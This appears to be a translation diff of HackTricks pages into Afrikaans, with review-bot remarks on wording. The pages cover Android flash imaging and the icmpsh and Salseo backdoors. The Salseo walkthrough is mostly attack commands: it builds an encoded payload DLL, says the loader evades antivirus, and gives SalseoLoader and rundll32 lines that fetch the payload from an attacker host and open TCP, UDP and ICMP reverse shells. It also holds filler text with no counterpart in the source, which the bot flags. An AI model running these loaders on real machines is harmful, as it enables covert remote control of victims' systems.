* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory).
|
||||
* `df /data` (Discover the block size of the system).
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size).
|
||||
* `cat /proc/partitions` (soek die pad na die flitsgeheue, gewoonlik is die eerste inskrywing _mmcblk0_ en stem ooreen met die hele flitsgeheue).
|
||||
* `df /data` (Ontdek die blokgrootte van die stelsel).
|
||||
* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (voer dit uit met die inligting wat ingesamel is van die blokgrootte).
|
||||
|
||||
### Memory
|
||||
### Geheue
|
||||
|
||||
Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb.
|
||||
Gebruik Linux Memory Extractor (LiME) om die RAM-inligting te onttrek. Dit is 'n kernel-uitbreiding wat gelaai moet word via adb.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
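Review bot: "Kyk of die toestel USB-afdeling aktief het." in the Geslote Toestel list mistranslates "debugging" as "afdeling" (a department or section); the Android setting meant is USB debugging, so write "Kyk of USB-ontfouting op die toestel geaktiveer is." In the same hunk, "worteltoegang" under the JTAG heading should stay "root-toegang": "root" is the name of the account, and the commands that follow (cat /proc/partitions, df /data, dd) assume the reader knows it by that name. The dd line is left without backticks exactly as in the source, so that is not a translation regression, but it could be fenced like the two commands above it.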
@ -1,62 +1,50 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
Laai die agterdeur af vanaf: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
|
||||
|
||||
# Client side
|
||||
# Kliëntkant
|
||||
|
||||
Execute the script: **run.sh**
|
||||
|
||||
**If you get some error, try to change the lines:**
|
||||
Voer die skrip uit: **run.sh**
|
||||
|
||||
**As jy 'n fout kry, probeer om die lyne te verander:**
|
||||
```bash
|
||||
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
|
||||
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
|
||||
```
|
||||
|
||||
**For:**
|
||||
|
||||
**Vir:**
|
||||
```bash
|
||||
echo Please insert the IP where you want to listen
|
||||
read IP
|
||||
```
|
||||
# **Slagofferkant**
|
||||
|
||||
# **Victim Side**
|
||||
|
||||
Upload **icmpsh.exe** to the victim and execute:
|
||||
|
||||
Laai **icmpsh.exe** op na die slagoffer se rekenaar en voer dit uit:
|
||||
```bash
|
||||
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
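Review bot: the footer line "github-opslag" differs from "github-opslagplekke" / "GitHub-opslagplekke" used for the identical sentence in the other files of this commit; this footer is shared boilerplate and should be pasted identically everywhere (suggest "GitHub-opslagplekke"). Also, "probeer om die lyne te verander" refers to lines of the run.sh script, for which "reëls" is the usual word; "lyne" reads as geometric lines.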
@ -2,171 +2,182 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Compiling the binaries
|
||||
## Kompilering van die binnerwerke
|
||||
|
||||
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.
|
||||
Laai die bronkode van die github af en kompileer **EvilSalsa** en **SalseoLoader**. Jy sal **Visual Studio** geïnstalleer moet hê om die kode te kompileer.
|
||||
|
||||
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
|
||||
Kompileer hierdie projekte vir die argitektuur van die Windows-boks waar jy dit gaan gebruik (As die Windows x64 ondersteun, kompileer dit vir daardie argitekture).
|
||||
|
||||
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".**
|
||||
Jy kan die argitektuur **kies** binne Visual Studio in die **linker "Build" Tab** in **"Platform Target".**
|
||||
|
||||
(\*\*If you can't find this options press in **"Project Tab"** and then in **"\<Project Name> Properties"**)
|
||||
(\*\*As jy hierdie opsies nie kan vind nie, druk op **"Project Tab"** en dan op **"\<Project Name> Properties"**)
|
||||
|
||||
![](<../.gitbook/assets/image (132).png>)
|
||||
|
||||
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
|
||||
Bou dan beide projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare lêer verskyn):
|
||||
|
||||
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
|
||||
|
||||
## Prepare the Backdoor
|
||||
## Berei die agterdeur voor
|
||||
|
||||
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:
|
||||
Eerstens sal jy die **EvilSalsa.dll** moet enkodeer. Jy kan die Python-skripsie **encrypterassembly.py** gebruik of jy kan die projek **EncrypterAssembly** kompileer:
|
||||
|
||||
### **Python**
|
||||
|
||||
```
|
||||
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
|
||||
```
|
||||
|
||||
### Windows
|
||||
|
||||
#### Salseo
|
||||
|
||||
Salseo is a backdoor that allows remote access to a compromised Windows system. It is commonly used by attackers to maintain persistence and control over the compromised system.
|
||||
|
||||
##### Features
|
||||
|
||||
- **Remote Access**: Salseo provides remote access to the compromised system, allowing the attacker to execute commands and interact with the system.
|
||||
- **Persistence**: Salseo is designed to maintain persistence on the compromised system, ensuring that the attacker can regain access even after system reboots.
|
||||
- **Stealth**: Salseo is designed to operate stealthily, avoiding detection by antivirus software and other security measures.
|
||||
- **Command Execution**: Salseo allows the attacker to execute arbitrary commands on the compromised system, giving them full control over the system.
|
||||
- **File Transfer**: Salseo supports file transfer between the attacker's system and the compromised system, allowing the attacker to exfiltrate data or upload additional tools.
|
||||
- **Keylogging**: Salseo can be configured to log keystrokes on the compromised system, allowing the attacker to capture sensitive information such as passwords.
|
||||
- **Screenshot Capture**: Salseo can capture screenshots of the compromised system, providing the attacker with visual information about the system's activities.
|
||||
- **Network Communication**: Salseo communicates with the attacker's system over the network, enabling remote control and data exfiltration.
|
||||
|
||||
##### Detection and Mitigation
|
||||
|
||||
- **Antivirus Software**: Keep your antivirus software up to date to detect and remove known instances of Salseo.
|
||||
- **Network Monitoring**: Monitor network traffic for suspicious activity, such as connections to known malicious IP addresses or unusual data transfers.
|
||||
- **System Hardening**: Implement security best practices, such as disabling unnecessary services, applying patches and updates, and using strong passwords.
|
||||
- **Behavioral Analysis**: Use behavioral analysis tools to detect abnormal system behavior that may indicate the presence of Salseo.
|
||||
- **Firewall**: Configure a firewall to block incoming and outgoing connections to known malicious IP addresses or suspicious domains.
|
||||
- **User Education**: Educate users about the risks of opening suspicious email attachments or clicking on malicious links, as these are common infection vectors for Salseo.
|
||||
|
||||
##### Conclusion
|
||||
|
||||
Salseo is a powerful backdoor that provides attackers with remote access and control over compromised Windows systems. Detecting and mitigating Salseo requires a combination of proactive security measures, such as antivirus software, network monitoring, system hardening, behavioral analysis, firewall configuration, and user education. By implementing these measures, you can significantly reduce the risk of Salseo infection and protect your systems from unauthorized access.
|
||||
```
|
||||
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
|
||||
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
|
||||
```
|
||||
Ok, nou het jy alles wat jy nodig het om die hele Salseo ding uit te voer: die **gekodeerde EvilDalsa.dll** en die **binêre van SalseoLoader.**
|
||||
|
||||
Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
|
||||
**Laai die SalseoLoader.exe binêre na die masjien op. Dit behoort nie deur enige AV opgespoor te word nie...**
|
||||
|
||||
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
|
||||
## **Voer die agterdeur uit**
|
||||
|
||||
## **Execute the backdoor**
|
||||
|
||||
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
|
||||
### **Kry 'n TCP-omgekeerde skulp (deur die gekodeerde dll af te laai deur HTTP)**
|
||||
|
||||
Onthou om 'n nc as die omgekeerde skulp luisteraar te begin en 'n HTTP-bediener om die gekodeerde evilsalsa te bedien.
|
||||
```
|
||||
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
|
||||
```
|
||||
### **Kry 'n UDP omgekeerde dop (laai gekodeerde dll af deur SMB)**
|
||||
|
||||
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
|
||||
|
||||
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
|
||||
|
||||
Onthou om 'n nc as die omgekeerde dop luisteraar te begin, en 'n SMB-bediener om die gekodeerde evilsalsa te dien (impacket-smbserver).
|
||||
```
|
||||
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
|
||||
```
|
||||
### **Kry 'n ICMP omgekeerde dop (geënkripteerde dll reeds binne die slagoffer)**
|
||||
|
||||
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
|
||||
|
||||
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
||||
|
||||
#### **Disable ICMP Replies:**
|
||||
**Hierdie keer het jy 'n spesiale instrument in die kliënt nodig om die omgekeerde dop te ontvang. Laai af:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
|
||||
|
||||
#### **Deaktiveer ICMP Antwoorde:**
|
||||
```
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
||||
|
||||
#You finish, you can enable it again running:
|
||||
sysctl -w net.ipv4.icmp_echo_ignore_all=0
|
||||
```
|
||||
|
||||
#### Execute the client:
|
||||
|
||||
#### Voer die kliënt uit:
|
||||
```
|
||||
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
|
||||
```
|
||||
|
||||
#### Inside the victim, lets execute the salseo thing:
|
||||
|
||||
#### Binne die slagoffer, laat ons die salseo ding uitvoer:
|
||||
```
|
||||
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
|
||||
```
|
||||
## Kompilering van SalseoLoader as DLL wat die hooffunksie uitvoer
|
||||
|
||||
## Compiling SalseoLoader as DLL exporting main function
|
||||
Maak die SalseoLoader-projek oop met behulp van Visual Studio.
|
||||
|
||||
Open the SalseoLoader project using Visual Studio.
|
||||
|
||||
### Add before the main function: \[DllExport]
|
||||
### Voeg voor die hooffunksie by: \[DllExport]
|
||||
|
||||
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### Install DllExport for this project
|
||||
### Installeer DllExport vir hierdie projek
|
||||
|
||||
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||
|
||||
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||
#### **Soek na die DllExport-pakket (deur die Browse-tabblad te gebruik) en druk op Installeer (en aanvaar die popup)**
|
||||
|
||||
![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||
In jou projeklêer het die lêers verskyn: **DllExport.bat** en **DllExport\_Configure.bat**
|
||||
|
||||
### **U**ninstall DllExport
|
||||
### **D**eïnstalleer DllExport
|
||||
|
||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||
Druk **Deïnstalleer** (ja, dit is vreemd, maar glo my, dit is nodig)
|
||||
|
||||
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
|
||||
|
||||
### **Exit Visual Studio and execute DllExport\_configure**
|
||||
### **Sluit Visual Studio af en voer DllExport\_configure uit**
|
||||
|
||||
Just **exit** Visual Studio
|
||||
Sluit eenvoudig Visual Studio af
|
||||
|
||||
Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
|
||||
Gaan dan na jou **SalseoLoader-lêer** en **voer DllExport\_Configure.bat uit**
|
||||
|
||||
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
|
||||
Kies **x64** (as jy dit binne 'n x64-boks gaan gebruik, dit was my geval), kies **System.Runtime.InteropServices** (binne **Namespace for DllExport**) en druk op **Apply**
|
||||
|
||||
![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)
|
||||
|
||||
### **Open the project again with visual Studio**
|
||||
### **Maak die projek weer oop met Visual Studio**
|
||||
|
||||
**\[DllExport]** should not be longer marked as error
|
||||
**\[DllExport]** behoort nie meer as 'n fout gemerk te wees nie
|
||||
|
||||
![](<../.gitbook/assets/image (8) (1).png>)
|
||||
|
||||
### Build the solution
|
||||
### Bou die oplossing
|
||||
|
||||
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
|
||||
Kies **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
|
||||
|
||||
![](<../.gitbook/assets/image (10) (1).png>)
|
||||
|
||||
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
|
||||
Kies **x64-platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
|
||||
|
||||
![](<../.gitbook/assets/image (9) (1) (1).png>)
|
||||
|
||||
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
|
||||
Om die oplossing te **bou**: Build --> Build Solution (Die pad van die nuwe DLL sal in die Uitvoerkonsole verskyn)
|
||||
|
||||
### Test the generated Dll
|
||||
### Toets die gegenereerde Dll
|
||||
|
||||
Copy and paste the Dll where you want to test it.
|
||||
|
||||
Execute:
|
||||
Kopieer en plak die Dll waar jy dit wil toets.
|
||||
|
||||
Voer uit:
|
||||
```
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
As geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!!
|
||||
|
||||
If no error appears, probably you have a functional DLL!!
|
||||
## Kry 'n skul gebruik die DLL
|
||||
|
||||
## Get a shell using the DLL
|
||||
|
||||
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
|
||||
Moenie vergeet om 'n **HTTP** **bediener** te gebruik en 'n **nc** **luisteraar** in te stel
|
||||
|
||||
### Powershell
|
||||
|
||||
```
|
||||
$env:pass="password"
|
||||
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
|
||||
|
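Review bot: the block between "### Windows" and the EncrypterAssembly.exe code fence ("#### Salseo", "##### Features", "##### Detection and Mitigation", "##### Conclusion") has no counterpart in the source page and is in English rather than Afrikaans; it is generic filler that describes capabilities (keylogging, screenshot capture, file transfer) the page itself never attributes to Salseo, and it separates the heading from the command it introduces. Drop it so that "### Windows" is followed directly by the code block, as the Python section above it is. Smaller terminology issues in the same hunk: "Kompilering van die binnerwerke" renders "binaries" as "binnerwerke" (innards) where "binêre lêers" is meant (the hunk itself uses "binêre" further down); "projeklêer" and "SalseoLoader-lêer" render "folder" as "lêer" (file) and should be "projekvouer" / "SalseoLoader-vouer"; "reverse shell" appears both as "omgekeerde skulp" and as "omgekeerde dop", and the heading "Kry 'n skul gebruik die DLL" is ungrammatical (suggest "Kry 'n dop met behulp van die DLL"); "geënkripteerde dll" in the ICMP heading should match the "gekodeerde" used for "encoded" in the TCP and UDP headings; and the footer's "github-repos" should be "GitHub-opslagplekke" like the other files.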
@ -175,9 +186,9 @@ $env:lport="1337"
|
|||
$env:shell="reversetcp"
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
### CMD
|
||||
|
||||
CMD (Command Prompt) is 'n opdraggewer wat beskikbaar is op Windows-bedryfstelsels. Dit bied 'n gebruikersvriendelike omgewing waarin gebruikers opdragte kan uitvoer om verskeie take uit te voer. Hierdie opdragte kan gebruik word om sagteware te installeer, lêers te skep en te wysig, netwerkverbindings te bestuur en vele ander funksies uit te voer. CMD is 'n kragtige hulpmiddel wat deur hackers gebruik kan word om toegang tot 'n stelsel te verkry en verskeie aanvalle uit te voer.
|
||||
```
|
||||
set pass=password
|
||||
set payload=http://10.2.0.5/evilsalsax64.dll.txt
|
||||
|
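Review bot: the paragraph inserted under "### CMD" ("CMD (Command Prompt) is 'n opdraggewer ...") has no counterpart in the English source, where the heading is followed directly by the code block; it is a generic description of the Windows command prompt and its closing sentence about hackers using it to gain access adds nothing to the page. Remove it so the Afrikaans file mirrors the source structure, as the Powershell section just above already does.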
@ -186,17 +197,16 @@ set lport=1337
|
|||
set shell=reversetcp
|
||||
rundll32.exe SalseoLoader.dll,main
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
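Review bot: the shared `<details>` footer is translated differently from file to file in this commit; this hunk renders "github repos" as "GitHub-opslagplekke" and "swag" as "uitrusting", while the `@ -1,195 +1,189 @@` hunk below uses "github-repos" and "swag" and the `@ -201,16 +195,14 @@` hunk uses "github-opslag". Since this block is identical boilerplate on every page, pick one rendering (for example "GitHub-opslagplekke" and "uitrusting") and apply it from a single template so the Afrikaans pages stay consistent.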
@ -1,195 +1,189 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
